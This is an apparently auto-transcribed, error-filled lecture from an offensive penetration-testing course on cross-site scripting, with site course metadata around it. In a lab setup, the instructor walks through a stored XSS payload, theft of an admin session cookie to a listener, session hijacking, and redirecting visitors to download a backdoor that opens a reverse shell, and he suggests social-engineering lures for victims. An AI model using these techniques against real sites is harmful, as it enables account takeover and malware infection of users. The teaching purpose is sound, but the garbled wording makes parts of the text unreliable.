Time
14 hours 43 minutes
Difficulty
Advanced
CEU/CPE
15

Video Transcription

00:00
Hello, everybody. Welcome to the episode number 18 off the RCP course.
00:05
Gross. I script in
00:07
my name is Alejandro Gonna and I'll be your instructor for today's session.
00:11
The learning objectivity is to understand the concepts behind this attack. And, you know the cross site scripting attack and apply to makes to implement across a script in a text will.
00:22
So let's get down to business, shall we?
00:26
First let me start by, you know, giving you some background of the chrysalis krypton attack. You know, this crisis gripping our X S s attacks are the type Are you know, some kind of injection in which my leash use scripts are injected into?
00:44
You know, I'll trust that websites if you like.
00:47
Chris, I script in tax accord. When an attacker, he uses away application input. Like, you know, search search box is common sections
00:58
to send or insert a malicious code.
01:02
You can imagine that a script or code will be executed by anybody trying to access that webpage. You know, flaws that allow these attacks are to succeed are quite, you know, easy to find because there, there, there, you know,
01:21
there's a lot of this building of lettuce on there or several Web pages around the world. Unfortunately,
01:27
you know, the in this case, the end user's browser has no way to know that the script should not be trusted because the school will be executed in a context where the webpages trusted. For example, you already performed the T. L s handshake
01:47
against the server. You already know that you're that's the server you're actually
01:53
trying to access. You know, maybe any commerce server. You're just trying to buy a T shirt or something like that. And you know that you already trust your browser Already trust in that server. There's no way to know that
02:08
that the malicious the script or malicious card is should not be trusted. So you know this. The script will be executed.
02:17
Now they're t treat three types. Of course, I script in tax. The 1st 1 I guess, is the most faithful famous one is disturbed Cross. I scripted
02:31
Mr Present script in
02:34
general area court cars when Caesar inputs
02:38
Ah, it's a start on the target server. You know, you put a malicious script
02:46
Ah, in common section so this could be saved in a database or you know, in the weapons itself,
02:53
Uh, you know, and you then
02:58
can retrieve information from any victim actually trying to access that webpage, for example, a cookie credentials. You can actually redirect that to another Web? H r. You know, perform any kind of delicious stuff.
03:14
The second type of precise krypton attack is there reflected precise krypton,
03:19
Or, you know, you can also finding us not non persistent. Chris, I script in tech.
03:24
This attack happens when the user inputs.
03:30
Um, you know what? Whatever the user inputs is returned by the web page a semester message, you know, search results or something like that.
03:40
You know, this is not kind of so common to use. You know, this is Sonal, a type, and the 3rd 1 and final is the down based
03:52
Chris as Krypton taik. You can also find it a stipe zero attack.
03:58
This is a form of precise written word. Entire data flow from serves to the sink takes place in the browser,
04:05
for example, that the breath officers of the data is in the dumb file. This thing, it's also the dumb file. Or don message the message. I'm sorry on the data flow never leaves the browser. So, you know, this is kind of what happens
04:21
in this tree. Different type of Chris I script in attacks. So let's see a practical example of that of the precise scripting attack in this case, I'm store based process Krypton attack.
04:34
So, uh, you remember we already have our web beach, but let me just show you here. We already have. Ah, Debbie in server running
04:46
just up in the browser type the peep Davian
04:53
because he has a really simple page has ah, common section has, uh, you know, to come in sections has an admin lug in which we don't have the password, by the way, um, so yeah, us. I told him for you can, uh,
05:11
as we're going to see a store. Chris, a script in attack.
05:14
You can actually try importing some basic comments. For example, just thio. See if this is actual invulnerable. Let me just type here test. And, for example, we can just start a script here, Script
05:30
alert and just look launch on alert, for example, cross site scripting
05:38
and just close the script.
05:42
A simple is that, um And as you can see, every time someone actually strained trying to access this, that the Lord will lunch. Um,
05:56
the problem is that, you know, this is not that malicious at all. Ah, but, you know, you can imagine you can do a lot of much stuff. You know, this is the browser I have in my column machine. But I have a next P machine running right here. And, you know, if I go to the er
06:15
to the home, I see this one comment in the welcome page. So if I go here, you can see the message the message launched saying, Chris, I scripted as we instructed, This is kind of, you know, trying to be like the victim of this attack
06:30
because, you know, here's the attacking machine, which is the server.
06:34
Ah, but
06:36
we already have the victim machine.
06:40
Uh, right here.
06:42
So But what happens if I wanted to do something more? Militias like stealing a cookie? Uh, I already have ah scraped running on the debian server side,
06:55
which
06:56
you know it. It tries to be like
06:59
some administration. I'm in straighter. I'm sorry.
07:02
Logging into the web h so we can, you know, try to mimic some someone trying to access the weapon to write about a valid credentials. So that's the assumption here. Just just so you know. So
07:16
we already have our or script here, but we can insert another comment that's too just to
07:24
And, um,
07:26
let me just copy Paste, um, that this script and I will split into you.
07:31
So this really simple script which, you know, you will write a document, and in this case, the document will be the cookie, and it will send it Thio, my listening server. I will open a port and, um, I will open a listener import 35 35
07:49
and that's it may not know that complicated at all again. The assumption is that in the Davian server, which you know, this weapon she's located there. So I have a simple script running which is trying to mimic on administration administrator long it into the weapon. So we will have a Bali cookie
08:07
that you know what's created due to ah barley Le Guin
08:11
at the service side,
08:13
and I inserted. And as you can see, there's another coming in here, So I now have to just up in a listener. So we can actually get the cookie back to us. I can use net cut or uncut. Ah, but it will die after we received the first cookie. Maybe
08:31
we're waiting for in a specific
08:33
cookie created from a specific I p R O R machine. So I like for these can implications. I like to use the python module, which is called http server. So we'll just type here python tree
08:50
dash m
08:50
tp that server. And as you remember, we put 85 85 we'll be listening for cookies
08:58
in the sport, eh? So we'll wait for a while. But, you know, meanwhile,
09:07
as you can imagine, we can also create, actually perform other malicious stuff
09:13
like, for example, ah, Red directing the user to a different webpage or, you know, using any type of malicious stuff. But, you know, I'll show you to you later in this video. So for now, we just copy the cookie and remember, we don't have access to admin,
09:31
but, you know, we can change that. So I just go to a cookie manager Plenty. And I'm I used this one, but you can use whatever you feel comfortable with and just you know, replace the cookie with the values when
09:43
saved, you know, close or whatever. If I go to at me and I don't need the bodies work anymore, I really have, you know, about the kicky which was created from a valley Le Guin. So you can see how dangerous could be. This could be,
09:58
um
10:01
the other thing that we can actually do is to let me just go to home here is to actually read Eject that. Look out If I go to at me and the cookies No, no longer ballot.
10:13
You know, we expect that the other thing we can do is do actually ing meanwhile, are serious evict cookies.
10:20
Uh, the other thing that we can do is to redirect again
10:24
the user thio down, look or debate them to download and specific file. I want,
10:33
uh, let me just copy paid the script here. Now we'll split it to you.
10:43
Uh, in this case, I'm just created a document, you know, put in a link and then going thio whenever this document gets loaded or, you know, someone actually enters to that weapon, you will redirect to that
10:58
document That, except this documented except contains about dirt. I mean, a river Shal how to create that is Ah, we'll see that later in other medias.
11:11
But, you know, we already created that. And there's your server. You go here,
11:18
you just copy. Paste out me here.
11:20
If you actually go here, you will see that the document will be download is already created. And I put it into my web ***
11:28
and just download link, you know, and that's it.
11:31
So
11:33
anyone actually trying to go here, you know, it will be redirected to that weapons. So I'm just using my windows victim here. And if I go to welcome. Okay, Chris, I scripted. And it will, as you can see, the doctor me with glee that that X ray will be downloaded.
11:52
So we can actually,
11:54
now you can imagine the victims are I mean, I already I use are executed on file, but you can imagine doing the same with a pdf file. Ah, word or excel file. You know, whatever. And the victim, if the victim Mrs Actual expecting something like that like you can,
12:15
um,
12:16
pretend to be this their CEO or something like that telling that to open the pdf Because
12:22
there's information about the last quarter sales numbers or something like that. The victims will often open it without any doubt. In this case, I just read it and are executed a file just to show you guys. But you can put that in more
12:39
usual four month for you.
12:43
So just let me just stop. Go here and start listener, you know, simple medical listener.
12:52
And 44444 if I remember correctly. And if I go to the big time here and I just ah, execute this, okay, Run. Whatever.
13:03
You can see that. Actually, we already have a reverse shell and all. The victim was doing this surfing the Web based, Remember, there's no suspicious thing about it. I mean, the Web server was the same words that the Web server, the I P or the Ho's name didn't change at all.
13:22
And I really have a bag Dirt. Ah, river shell
13:26
if you want.
13:28
So,
13:30
you know, just to show you
13:33
I can already that the guy p and you know
13:37
what can I tell you? Huh? Nets that
13:41
yes, to show.
13:46
Oh, what? It wasn't that.
13:48
And to show you how the injuries could be.
13:52
Just give me
13:56
eyes. This decline based or a server race attack. Well, even though we actually target the server, but because we're uncertain the server, the script on server, the effective ones are declines. This could be true for, you know, store base. Remember there three types of tack,
14:16
Mr Burt. Mr. Bae's referred to reflect the base and Dom based tax.
14:20
Ah, we can also target declined directly. Uh, you know, the most common Guan is the one that is to target the server and declines defected one.
14:31
Can we actually gained remote controlled through this attack? Yeah, we can. I mean, we just showed I just showed you that you can, you know, by true, maybe social engineer or, you know, just in certain that in the weapons, the victims who already trust in that in that web server, Well, uh,
14:50
download and up in any file,
14:54
you're attached to it,
14:56
we'll learn a bit of summary. We learn the concepts of this attack, and we implemented into the Thompson next to secure this attack. And we saw how malicious they said That can be,
15:09
uh, you know, you can check the hacker playbook. A tree? Actually, you can use that book as reference for these complete module. Ah, this attacks are you? No mention it in that book. And I think they're really great book off, bro.
15:24
And, you know, as you can also see all of these attacks of this martial every possible source on Google and YouTube, it will be useful for you.
15:33
Uh, looking forward in the next video will cover SQL injection
15:39
eso
15:41
That's it for today, folks. I hoping you're the video and talk to you soon.

Up Next

Offensive Penetration Testing

This is a deep course about penetration testing. In this course, you’ll learn from basic to the most advanced and modern techniques to find vulnerabilities through information gathering, create and/or use exploits and be able to escalate privileges in order to test your information systems defenses.

Instructed By

Instructor Profile Image
Alejandro Guinea
CERT Regional Director
Instructor